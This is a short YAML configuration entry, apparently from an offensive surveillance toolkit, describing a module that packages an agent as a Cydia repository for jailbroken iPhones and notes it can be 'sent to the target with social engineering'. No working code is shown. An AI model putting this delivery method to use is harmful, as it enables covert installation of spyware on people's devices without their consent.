version: 20140930
id: HT-2012-007
name: iOS Cydia Installer
category: :social
format: 
- deb
platform: ios
multiserver: true
exec: ruby cydia.rb "%AGENT%" %URL% "%OUTPUT%" %OUTPUT_SERVER%
params:
  string: URL
description: "<br>This exploit will create an instalaltion package for cydia. The output file is a txt with the link to the cydia repository. The repository can be used locally (after jailbreaking the device) or sent to the target with social engineering.<br><br><b>Output:</b> TXT file<br><br><b>Platform:</b> iOS<br><b>Tested on:</b> All platform with Cydia installed"
